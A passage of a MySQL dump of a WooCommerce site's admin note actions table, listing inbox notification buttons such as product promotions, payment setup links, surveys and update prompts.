  `status` varchar(255) NOT NULL,
  `is_primary` tinyint(1) NOT NULL DEFAULT 0,
  `actioned_text` varchar(255) NOT NULL,
  `nonce_action` varchar(255) DEFAULT NULL,
  `nonce_name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `note_id` (`note_id`)
) ENGINE=InnoDB AUTO_INCREMENT=90374 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_admin_note_actions`
--

LOCK TABLES `wp_wc_admin_note_actions` WRITE;
/*!40000 ALTER TABLE `wp_wc_admin_note_actions` DISABLE KEYS */;
INSERT INTO `wp_wc_admin_note_actions` VALUES (34,32,'notify-refund-returns-page','Edit page','https://www.mangomitra.in/wp-admin/post.php?post=12&action=edit','actioned',0,'',NULL,NULL),(35,33,'connect','Connect','?page=wc-addons&section=helper','unactioned',0,'',NULL,NULL),(169,35,'day-after-first-product','Learn more','https://docs.woocommerce.com/document/woocommerce-customizer/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),(170,36,'add-store-details','Add store details','https://www.mangomitra.in/wp-admin/admin.php?page=wc-admin&path=/setup-wizard','actioned',0,'',NULL,NULL),(405,40,'affirm-insight-first-product-and-payment','Yes','','actioned',0,'Thanks for your feedback',NULL,NULL),(406,40,'affirm-insight-first-product-and-payment','No','','actioned',0,'Thanks for your feedback',NULL,NULL),(440,41,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_medium=product','actioned',0,'',NULL,NULL),(904,43,'tracking-opt-in','Activate usage tracking','','actioned',1,'',NULL,NULL),(907,45,'affirm-insight-first-sale','Yes','','actioned',0,'Thanks for your feedback',NULL,NULL),(908,45,'deny-insight-first-sale','No','','actioned',0,'Thanks for your feedback',NULL,NULL),(5026,22,'get-woo-commerce-payments','Get WooCommerce Payments','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,'',NULL,NULL),(5027,23,'get-woocommerce-payments','Get WooCommerce Payments','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,'',NULL,NULL),(6715,1,'stripe_applepay_holiday2021','Accept Apple Pay','https://woocommerce.com/apple-pay/','actioned',1,'',NULL,NULL),(6716,2,'square_applepay_holiday2021','Accept Apple Pay','https://woocommerce.com/apple-pay/','actioned',1,'',NULL,NULL),(6717,3,'wcpay_applepay_holiday2021','Accept Apple Pay','https://woocommerce.com/apple-pay/','actioned',1,'',NULL,NULL),(6746,46,'wc_simple_payments_m2_reader_launch_q1_2022','Learn more','https://woocommerce.com/in-person-payments/','actioned',0,'',NULL,NULL),(6750,51,'lead_gen_existing_customers_1','Yes, please','https://woocommerce.com/take-your-business-to-the-next-level/','actioned',0,'',NULL,NULL),(7030,52,'remove-legacy-coupon-menu','Remove legacy coupon menu','https://mangomitra.in/wp-admin/admin.php?page=wc-admin&action=remove-coupon-menu','actioned',1,'',NULL,NULL),(7253,47,'wcpay_applepay_q1_2022','Let your customers know about Apple Pay','https://developer.apple.com/apple-pay/marketing/','actioned',0,'',NULL,NULL),(7254,48,'stripe_applepay_q1_2022','Add Apple Pay','https://mangomitra.in/wp-admin/admin.php?page=wc-admin&page=wc-settings&tab=checkout&section=stripe','actioned',0,'',NULL,NULL),(7255,49,'square_applepay_q1_2022','Add Apple Pay','https://mangomitra.in/wp-admin/admin.php?page=wc-admin&page=wc-settings&tab=square','actioned',0,'',NULL,NULL),(8226,61,'browse','Browse','https://woocommerce.com/success-stories/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),(8228,50,'update-store-details','Update store details','https://gopalak.in/wp-admin/admin.php?page=wc-admin&path=/setup-wizard','actioned',0,'',NULL,NULL),(8458,63,'googlelistings_signals2022_hasGLA_click','Connect Google Listings & Ads','https://gopalak.in/wp-admin/admin.php?page=wc-admin&path=marketing','unactioned',0,'',NULL,NULL),(8459,64,'googlelistings_signals2022_noGLA','Connect Google Listings & Ads','https://woocommerce.com/products/google-listings-and-ads/?utm_medium=product&utm_source=inbox_note&utm_campaign=googlelistings_signals2022_noGLA','unactioned',0,'',NULL,NULL),(10197,67,'facebook_q4-2022_hasFB-click','Drive more demand','https://gopalak.in/wp-admin/admin.php?page=wc-facebook','unactioned',0,'',NULL,NULL),(10279,68,'facebook_q4-2022_noFB-click','Get started','https://woocommerce.com/products/facebook/?utm_source=inbox_note&utm_medium=product&utm_campaign=facebook_q4-2022_noFB-click','unactioned',0,'',NULL,NULL),(10407,7,'wc_shipping_mobile_app_q4_2021','Get the WooCommerce Mobile App','https://woocommerce.com/mobile/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_shipping_mobile_app_q4_2021','actioned',0,'',NULL,NULL),(10408,8,'set-up-concierge','Schedule free session','https://wordpress.com/me/concierge','actioned',0,'',NULL,NULL),(10410,10,'learn-more-ecomm-unique-shopping-experience','Learn more','https://docs.woocommerce.com/document/product-add-ons/?utm_source=inbox','actioned',0,'',NULL,NULL),(10411,11,'watch-the-webinar','Watch the webinar','https://youtu.be/V_2XtCOyZ7o','actioned',0,'',NULL,NULL),(10414,14,'learn-more','Learn more','https://woocommerce.com/posts/first-things-customize-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),(10555,70,'view-report','View report','?page=wc-admin&path=/analytics/revenue&period=custom&compare=previous_year&after=2022-10-27&before=2022-10-27','actioned',0,'',NULL,NULL),(12352,65,'shipping_category_q4_2022_click','Automate my shipping','https://woocommerce.com/product-category/woocommerce-extensions/shipping-delivery-and-fulfillment/?categoryIds=28685&collections=product&page=1&utm_source=inbox_note&utm_medium=product&utm_campaign=shipping_category_q4_2022_click','unactioned',0,'',NULL,NULL),(12583,78,'meta-hasFB-dec-q4-2022','Connect your store','https://gopalak.in/wp-admin/admin.php?page=wc-facebook','unactioned',0,'',NULL,NULL),(12841,79,'meta-noFB-dec-q4-2022','Get started','https://woocommerce.com/products/facebook/?utm_source=inbox_note&utm_medium=product&utm_campaign=meta-noFB-dec-q4-2022','unactioned',0,'',NULL,NULL),(13133,75,'wc-admin-manualauthcapture','Learn more','https://woocommerce.com/document/woocommerce-payments/settings-guide/authorize-and-capture/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-manualauthcapture','actioned',0,'',NULL,NULL),(13540,69,'tiktok-targeted-q4-2022-click','Launch a campaign','https://woocommerce.com/products/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=tiktok-targeted-q4-2022-click','unactioned',0,'',NULL,NULL),(13544,76,'apple_pay_square_q422','Enable Apple Pay','https://gopalak.in/wp-admin/wp-admin/admin.php?page=wc-settings&tab=checkout&section=square_credit_card','unactioned',0,'',NULL,NULL),(13545,77,'apple_pay_wcpay_q422','Enable Apple Pay','https://gopalak.in/wp-admin/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments','unactioned',0,'',NULL,NULL),(13720,31,'share-navigation-survey-feedback','Share feedback','https://automattic.survey.fm/feedback-on-woocommerce-navigation','actioned',0,'',NULL,NULL),(14169,82,'storeediting_feedback_jan_2023','Share your input','https://t.maze.co/135212793','actioned',0,'',NULL,NULL),(14372,72,'woocommerce_admin_deprecation_q4_2022','Deactivate WooCommerce Admin','https://gopalak.in/wp-admin/plugins.php','actioned',0,'',NULL,NULL),(14373,71,'paypal_paylater_g3_q4_22','Install PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g3_q4_22','unactioned',0,'',NULL,NULL),(14414,73,'paypal_paylater_g2_q4_22','Install PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g2_q4_22','unactioned',0,'',NULL,NULL),(16277,85,'affirm_q1_2023','Get started with Affirm','https://woocommerce.com/products/woocommerce-gateway-affirm/?utm_source=inbox_note&utm_medium=product&utm_campaign=affirm_q1_2023','actioned',0,'',NULL,NULL),(18444,107,'woopay-beta-existingmerchants-noaction-documentation-27APR23-test2','Documentation','https://woocommerce.com/document/woopay-merchant-documentation/?utm_source=inbox_note&utm_medium=product&utm_campaign=woopay-beta-existingmerchants-noaction-documentation-27APR23-test2','actioned',0,'',NULL,NULL),(18445,107,'woopay-beta-existingmerchants-noaction-documentation-27APR23-dismiss-test2','Dismiss','https://gopalak.in/wp-admin/#','actioned',0,'',NULL,NULL),(18446,108,'woopay-beta-existingmerchants-update-WCPay-27APR23-test','Update WooCommerce Payments','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','actioned',0,'',NULL,NULL),(18447,108,'woopay-beta-existingmerchants-update-WCPay-27APR23-dismiss-test','Dismiss','https://gopalak.in/wp-admin/#','actioned',0,'',NULL,NULL),(19922,104,'wc-admin-BNPL-WCPay-coming-soon','Sign up now','https://woocommerce.com/buy-now-pay-later-for-woocommerce-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-BNPL-WCPay-coming-soon','actioned',0,'',NULL,NULL),(20295,119,'payoneer_q2_2023','Get started with Payoneer','https://woocommerce.com/products/payoneer-checkout?utm_source=inbox_note&utm_medium=product&utm_campaign=payoneer_q2_2023','actioned',0,'',NULL,NULL),(20506,86,'google_listings_ads_pmax_i1_q1_2023_no_gla','Boost my business with Google','https://woocommerce.com/products/google-listings-and-ads/?utm_source=inbox_note&utm_medium=product&utm_campaign=google_listings_ads_pmax_i1_q1_2023_no_gla','actioned',0,'',NULL,NULL),(20507,87,'google_listings_ads_pmax_i1_q1_2023_with_gla','Create a new ad','https://woocommerce.com/products/google-listings-and-ads/?utm_source=inbox_note&utm_medium=product&utm_campaign=google_listings_ads_pmax_i1_q1_2023_with_gla','actioned',0,'',NULL,NULL),(21090,92,'wc-admin-wcpay-denmark-Q2-2023','Simplify my payments','https://woocommerce.com/payments/denmark/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-denmark-Q2-2023','actioned',0,'',NULL,NULL),(21091,93,'wc-admin-wcpay-greece-Q2-2023','Simplify my payments','https://woocommerce.com/payments/greece/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-greece-Q2-2023','actioned',0,'',NULL,NULL),(21092,94,'wc-admin-wcpay-norway-Q2-2023','Simplify my payments','https://woocommerce.com/payments/norway/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-norway-Q2-2023','actioned',0,'',NULL,NULL),(21093,95,'wc-admin-wcpay-slovakia-Q2-2023','Simplify my payments','https://woocommerce.com/payments/slovakia/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-slovakia-Q2-2023','actioned',0,'',NULL,NULL),(21094,96,'wc-admin-wcpay-finland-Q2-2023','Simplify my payments','https://woocommerce.com/payments/finland/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-finland-Q2-2023','actioned',0,'',NULL,NULL),(21095,97,'wc-admin-wcpay-estonia-Q2-2023','Simplify my payments','https://woocommerce.com/payments/estonia/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-estonia-Q2-2023','actioned',0,'',NULL,NULL),(21096,98,'wc-admin-wcpay-lithuania-Q2-2023','Simplify my payments','https://woocommerce.com/payments/lithuania/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-lithuania-Q2-2023','actioned',0,'',NULL,NULL),(21097,99,'wc-admin-wcpay-slovenia-Q2-2023','Simplify my payments','https://woocommerce.com/payments/slovenia/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-slovenia-Q2-2023','actioned',0,'',NULL,NULL),(21098,100,'wc-admin-wcpay-latvia-Q2-2023','Simplify my payments','https://woocommerce.com/payments/latvia/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-latvia-Q2-2023','actioned',0,'',NULL,NULL),(21099,101,'wc-admin-wcpay-cyprus-Q2-2023','Simplify my payments','https://woocommerce.com/payments/cyprus/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-cyprus-Q2-2023','actioned',0,'',NULL,NULL),(21100,102,'wc-admin-wcpay-malta-Q2-2023','Simplify my payments','https://woocommerce.com/payments/malta/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-malta-Q2-2023','actioned',0,'',NULL,NULL),(21101,103,'wc-admin-wcpay-luxembourg-Q2-2023','Simplify my payments','https://woocommerce.com/payments/luxembourg/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-luxembourg-Q2-2023','actioned',0,'',NULL,NULL),(21124,122,'product_management_card_sorting','Get started','https://t.maze.co/163892579','unactioned',0,'',NULL,NULL),(23876,135,'tiktok-spc_june-2023','Optimize my advertising','https://woocommerce.com/products/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=tiktok-spc_june-2023','actioned',0,'',NULL,NULL),(24762,4,'browse_extensions','Browse extensions','https://gopalak.in/wp-admin/admin.php?page=wc-addons','unactioned',0,'',NULL,NULL),(24880,58,'wc-admin-wisepad3','Grow my business offline','https://woocommerce.com/products/wisepad3-card-reader/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wisepad3','actioned',0,'',NULL,NULL),(25419,74,'google_listings_ads_custom_attribute_mapping_q4_2022','Learn more','https://woocommerce.com/document/google-listings-and-ads/?utm_source=inbox_note&utm_medium=product&utm_campaign=google_listings_ads_custom_attribute_mapping_q4_2022#attribute-mapping','actioned',0,'',NULL,NULL),(26263,127,'woocommerce_hpos_1st_notification_q2_2023','Learn more about HPOS','https://woocommerce.com/posts/platform-update-high-performance-order-storage-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=woocommerce_hpos_1st_notification_q2_2023','actioned',0,'',NULL,NULL),(26541,139,'square_button_q3_2023','Get started with Square','https://woocommerce.com/products/square/?utm_source=inbox_note&utm_medium=product&utm_campaign=square_button_q3_2023','actioned',0,'',NULL,NULL),(26902,140,'wc-admin-woopayments-rebrand','Learn more about WooPayments','https://woocommerce.com/payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-woopayments-rebrand','actioned',0,'',NULL,NULL),(27002,145,'tiktok-apac-webinar-2023','RSVP today','https://unlockingtiktokwithwoocommerce.splashthat.com/','actioned',0,'',NULL,NULL),(27659,147,'avalara_q3-2023_withAvaTax','Learn more about VAT settings','https://woocommerce.com/document/avalara-avatax/?utm_source=inbox_note&utm_medium=product&utm_campaign=avalara_q3-2023_withAvaTax#section-15','unactioned',0,'',NULL,NULL),(27755,148,'google_uxstudy_recruitment_q3-2023','Take the survey','https://eachandother.fra1.qualtrics.com/jfe/form/SV_0W118szcJOtIkzc','unactioned',0,'',NULL,NULL),(28116,129,'wc-admin-wcpay-bulgaria-Q2-2023','Simplify my payments','https://woocommerce.com/payments/bulgaria/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-bulgaria-Q2-2023','actioned',0,'',NULL,NULL),(28117,130,'wc-admin-wcpay-czechia-Q2-2023','Simplify my payments','https://woocommerce.com/payments/czechia/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-czechia-Q2-2023','actioned',0,'',NULL,NULL),(28118,131,'wc-admin-wcpay-croatia-Q2-2023','Simplify my payments','https://woocommerce.com/payments/croatia/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-croatia-Q2-2023','actioned',0,'',NULL,NULL),(28119,132,'wc-admin-wcpay-hungary-Q2-2023','Simplify my payments','https://woocommerce.com/payments/hungary/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-hungary-Q2-2023','actioned',0,'',NULL,NULL),(28120,133,'wc-admin-wcpay-romania-Q2-2023','Simplify my payments','https://woocommerce.com/payments/romania/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-romania-Q2-2023','actioned',0,'',NULL,NULL),(28121,134,'wc-admin-wcpay-sweden-Q2-2023','Simplify my payments','https://woocommerce.com/payments/sweden/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wcpay-sweden-Q2-2023','actioned',0,'',NULL,NULL),(29055,90,'tap_to_pay_iphone_q2_2023_with_wcpay','Set up Tap to Pay on iPhone','https://woocommerce.com/document/woopayments/in-person-payments/tap-to-pay-iphone?utm_source=inbox_note&utm_medium=product&utm_campaign=tap_to_pay_iphone_q2_2023_with_wcpay','actioned',0,'',NULL,NULL),(29694,120,'ipp_refresh_q2_2023_us_inbox_notification','Grow my business on the go','https://woocommerce.com/in-person-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=ipp_refresh_q2_2023_us_inbox_notification','actioned',0,'',NULL,NULL),(29695,121,'ipp_refresh_q2_2023_ca_inbox_notification','Grow my business on the go','https://woocommerce.com/in-person-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=ipp_refresh_q2_2023_ca_inbox_notification','actioned',0,'',NULL,NULL),(30321,150,'tiktok_shopGTM_q3-2023_hasTikTok','Learn more','https://woocommerce.com/document/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=tiktok_shopGTM_q3-2023_hasTikTok','unactioned',0,'',NULL,NULL),(30408,151,'tiktok_shopGTM_q3-2023_noTikTok','Learn more','https://woocommerce.com/products/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=tiktok_shopGTM_q3-2023_noTikTok','unactioned',0,'',NULL,NULL),(31014,152,'klaviyo_q3_2023','Integrate in minutes','https://woocommerce.com/products/klaviyo-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=klaviyo_q3_2023','unactioned',0,'',NULL,NULL),(32680,153,'wc_admin_BNPL_WCPay_Q3_2023','Enable buy now, pay later','https://woocommerce.com/?post_type=documentation&p=18734002212927&preview=true&utm_source=inbox_note&utm_medium=product&utm_campaign=wc_admin_BNPL_WCPay_Q3_2023','actioned',0,'',NULL,NULL),(32681,154,'wc_admin_afterpay_WCPay_Q3_2023','Enable buy now, pay later','https://woocommerce.com/?post_type=documentation&p=18734002212927&preview=true&utm_source=inbox_note&utm_medium=product&utm_campaign=wc_admin_afterpay_WCPay_Q3_2023','actioned',0,'',NULL,NULL),(33753,156,'Klarna_Enable_CTA_10OCT23','Enable Klarna','https://gopalak.in/wp-admin/wp-admin/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments/#payment-methods','actioned',0,'',NULL,NULL),(33754,156,'Klarna_Update_CTA_10OCT23','Update WooPayments','https://gopalak.in/wp-admin/wp-admin/plugins.php?s=woocommercepayments&plugin_status=all','actioned',0,'',NULL,NULL),(35683,157,'wc_com_in_person_payments_card_sale_US_inbox_note_q4_23','Save 35%','https://woocommerce.com/products/m2-card-reader/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_com_in_person_payments_card_sale_US_inbox_note_q4_23','actioned',0,'',NULL,NULL),(35684,158,'wc_com_in_person_payments_card_sale_UK_inbox_note_q4_23','Save 35%','https://woocommerce.com/products/wisepad3-card-reader/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_com_in_person_payments_card_sale_UK_inbox_note_q4_23','actioned',0,'',NULL,NULL),(35685,159,'wc_com_in_person_payments_card_sale_CA_inbox_note_q4_23','Save 35%','https://woocommerce.com/products/wisepad3-card-reader/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_com_in_person_payments_card_sale_CA_inbox_note_q4_23','actioned',0,'',NULL,NULL),(35779,161,'wc_admin_WooPay_Q4_2023','Get started today','https://gopalak.in/wp-admin/https://woocommerce.com/document/woopay-merchant-documentation/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_admin_WooPay_Q4_2023','actioned',0,'',NULL,NULL),(36445,163,'paypal_paylater_g2_q4_22','Install PayPal Payments','https://woo.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g2_q4_22','unactioned',0,'',NULL,NULL),(36960,162,'wc_admin_WooPay_Oct30_2023','Get started today','https://woo.com/document/woopay-merchant-documentation/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_admin_WooPay_Oct30_2023','actioned',0,'',NULL,NULL),(40703,164,'tap_to_pay_iphone_q4_2023_no_woopayments','Simplify my payments','https://woo.com/products/woopayments/?utm_source=inbox_note&utm_medium=product&utm_campaign=tap_to_pay_iphone_q4_2023_no_woopayments','actioned',0,'',NULL,NULL),(40704,165,'tap_to_pay_iphone_q4_2023_with_woopayments','Set up Tap to Pay on iPhone','https://woo.com/document/woopayments/in-person-payments/tap-to-pay-iphone/?utm_source=inbox_note&utm_medium=product&utm_campaign=tap_to_pay_iphone_q4_2023_with_woopayments','actioned',0,'',NULL,NULL),(42933,55,'update-db_run','Update WooCommerce Database','https://gopalak.in/wp-admin/admin.php?page=wp_file_manager&do_update_woocommerce=true','unactioned',0,'wc_db_update','wc_db_update','wc_db_update_nonce'),(42934,55,'update-db_learn-more','Learn more about updates','https://woo.com/document/how-to-update-woocommerce/','unactioned',0,'',NULL,NULL),(46873,169,'custom_order_attribution_inbox_q1_2024','Find more clarity','https://woo.com/document/order-attribution-tracking/?utm_source=inbox_note&utm_medium=product&utm_campaign=custom_order_attribution_inbox_q1_2024','actioned',0,'',NULL,NULL),(48801,59,'learn-more','Find out more','https://developer.woocommerce.com/2022/08/09/woocommerce-payments-3-9-4-4-5-1-security-releases/','unactioned',0,'',NULL,NULL),(48802,59,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(48803,60,'learn-more','Find out more','https://developer.woocommerce.com/2022/08/09/woocommerce-payments-3-9-4-4-5-1-security-releases/','unactioned',0,'',NULL,NULL),(48804,60,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),(49972,170,'wc_admin_UKpricingchange_WCPay_Q1_2024','See related fees for each country','https://woo.com/document/woopayments/fees-and-debits/fees/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_admin_UKpricingchange_WCPay_Q1_2024#countries-in-europe','actioned',0,'',NULL,NULL),(50335,167,'amazon_pay_ext-link_q1-24','Register your account now','https://eu.amazonpayments.com/2024-uk-woopricepromoregistration?utm_campaign=woo_price_promo&utm_medium=EM&utm_source=direct&utm_content=cta&utm_creative=&ld=EMUKAPA-woo_price_promo-direct-24Q1','actioned',0,'',NULL,NULL),(52948,84,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),(52949,38,'learn-more','Learn more','https://woocommerce.com/posts/pre-launch-checklist-the-essentials/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),(52950,62,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),(52951,66,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),(52952,44,'learn-more','Learn more','https://woocommerce.com/payments/?utm_medium=product','unactioned',0,'',NULL,NULL),(52953,44,'get-started','Get started','https://gopalak.in/wp-admin/admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',0,'','setup-woocommerce-payments',''),(54097,173,'affirm_q2_2024','Power up your payments','https://woocommerce.com/products/woocommerce-gateway-affirm/?utm_source=inbox_note&utm_medium=product&utm_campaign=affirm_q2_2024','actioned',0,'',NULL,NULL),(54733,171,'airwallex_q1_2024','Get started with Airwallex','https://woocommerce.com/products/airwallexpayments/?utm_source=inbox_note&utm_medium=product&utm_campaign=airwallex_q1_2024','actioned',0,'',NULL,NULL),(54886,123,'woocommerce-WCStripe-May-2023-updated-needed-Plugin-Settings','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(54887,123,'woocommerce-WCStripe-May-2023-updated-needed-Plugin-Settings-dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(54888,126,'woocommerce-WCPayments-June-2023-updated-needed-Plugin-Settings','See available updates','https://gopalak.in/wp-admin/plugins.php?plugin_status=all','unactioned',0,'',NULL,NULL),(54889,126,'woocommerce-WCPayments-June-2023-updated-needed-Dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(54904,143,'woocommerce-WooPayments-Aug-2023-update-needed','See available updates','https://gopalak.in/wp-admin/update-core.php?','unactioned',0,'',NULL,NULL),(54905,143,'dismiss','Dismiss','#','actioned',0,'',NULL,NULL),(55689,172,'checkout_survey_new_users_share_feedback','Share feedback','https://automattic.survey.fm/woocommerce-checkout-survey','unactioned',0,'',NULL,NULL),(55690,174,'checkout_survey_new_users_no_orders_share_feedback','Share feedback','https://automattic.survey.fm/woocommerce-checkout-survey','unactioned',0,'',NULL,NULL),(57996,176,'mailchimp_q2_2024','Connect now','https://woocommerce.com/products/mailchimp-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=mailchimp_q2_2024','actioned',0,'',NULL,NULL),(58256,177,'WC-order-attribution-update-June-2024-click','See available updates','https://gopalak.in/wp-admin/update-core.php?','unactioned',0,'',NULL,NULL),(58257,177,'WC-order-attribution-update-June-2024-dismiss','Dismiss','https://gopalak.in/wp-admin/#','actioned',0,'',NULL,NULL),(60405,179,'bfcm-survey-jul2024-click','Take the Survey','https://2yp7yqymm1z.typeform.com/holidaysurvey','unactioned',0,'',NULL,NULL),(60580,180,'stripe_newcheckout_q3_2024_click','Get the new checkout','https://woocommerce.com/document/stripe/admin-experience/new-checkout-experience/?utm_source=inbox_note&utm_medium=product&utm_campaign=stripe_newcheckout_q3_2024_click','unactioned',0,'',NULL,NULL),(60750,175,'woocommerce-payfast-may-2024-update-needed-click','See available updates','https://gopalak.in/wp-admin/update-core.php?','unactioned',0,'',NULL,NULL),(60751,175,'woocommerce-payfast-may-2024-update-needed-dismiss','Dismiss','https://gopalak.in/wp-admin/#','actioned',0,'',NULL,NULL),(60752,178,'checkout_block_update_july_2024','Learn more','https://woocommerce.com/document/cart-checkout-blocks-status/changes-in-woocommerce-9-0/?utm_source=inbox_note&utm_medium=product&utm_campaign=checkout_block_update_july_2024','actioned',0,'',NULL,NULL),(63331,181,'klaviyo_q4_2024','Try Klaviyo for free','https://woocommerce.com/products/klaviyo-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=klaviyo_q4_2024','actioned',0,'',NULL,NULL),(63500,9,'learn-more','Learn more','https://docs.woocommerce.com/document/woocommerce-shipping-and-tax/?utm_source=inbox','unactioned',0,'',NULL,NULL),(64323,182,'wnww-recap-july-button','See what’s new','https://woocommerce.com/posts/new-with-woo-july-2024/?utm_source=inbox_note&utm_medium=product&utm_campaign=wnww-recap-july-button','unactioned',0,'',NULL,NULL),(65054,149,'woo-activation-survey-blockers-survey-button-22AUG23','Take our short survey','https://woocommerce.survey.fm/getting-started-with-woo','unactioned',0,'',NULL,NULL),(67008,183,'bfcm2024-landing-page-button','Read the report','https://woocommerce.com/black-friday-trends?utm_source=inbox_note&utm_medium=product&utm_campaign=bfcm2024-landing-page-button','unactioned',0,'',NULL,NULL),(70275,185,'paypal_cta_q3_2024','Get PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_cta_q3_2024','unactioned',0,'',NULL,NULL),(72325,184,'stripe_securityupdate_q4_2024_click','Review and update','https://woocommerce.com/document/stripe/admin-experience/updated-requirements-for-stripe-plugin-mid-2024/?utm_source=inbox_note&utm_medium=product&utm_campaign=stripe_securityupdate_q4_2024_click','unactioned',0,'',NULL,NULL),(72987,187,'paypal_cta_q3_2024_v2','Get PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_cta_q3_2024_v2','unactioned',0,'',NULL,NULL),(73151,186,'mollie_q4_2024','Get paid with Mollie','https://woocommerce.com/products/mollie-payments-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=mollie_q4_2024','unactioned',0,'',NULL,NULL),(75098,188,'Renewal_notification_emails_Woosubscriptions_button_Nov2024','Set up automatic subscription reminders','https://woocommerce.com/document/subscriptions/subscriptions-notifications/?utm_source=inbox_note&utm_medium=product&utm_campaign=Renewal_notification_emails_Woosubscriptions_button_Nov2024','unactioned',0,'',NULL,NULL),(75911,189,'paypal_promo_Q4_2024','Add PayPal today','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_promo_Q4_2024','unactioned',0,'',NULL,NULL),(77422,192,'Announce-UPS-WCShipping-button-Dec2024','Ship with UPS on WooCommerce','https://woocommerce.com/ups-and-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=Announce-UPS-WCShipping-button-Dec2024','unactioned',0,'',NULL,NULL),(77926,191,'usps-mail-service-to-canada-suspended-dec-2024','Stay up to date','https://about.usps.com/newsroom/service-alerts/international/canada-suspension.htm','unactioned',0,'',NULL,NULL),(78178,193,'account-creation-after-checkout-button-dec2024','Enable it today','https://woocommerce.com/document/woocommerce-store-editing/customizing-order-confirmation-page/?utm_source=inbox_note&utm_medium=product&utm_campaign=account-creation-after-checkout-button-dec2024','unactioned',0,'',NULL,NULL),(81887,195,'affirm_promo_Q1_2025','Save with Affirm','https://woocommerce.com/products/woocommerce-gateway-affirm/?utm_source=inbox_note&utm_medium=product&utm_campaign=affirm_promo_Q1_2025','unactioned',0,'',NULL,NULL),(82226,196,'new-woo-brand-announcement-feb4-2025-button','Read the blog','https://woocommerce.com/posts/introducing-the-new-woo-brand/?utm_source=inbox_note&utm_medium=product&utm_campaign=new-woo-brand-announcement-feb4-2025-button','unactioned',0,'',NULL,NULL),(82733,197,'paypal_bnpl_au_promo_Q1_2025_button','Enable “Pay in 4” 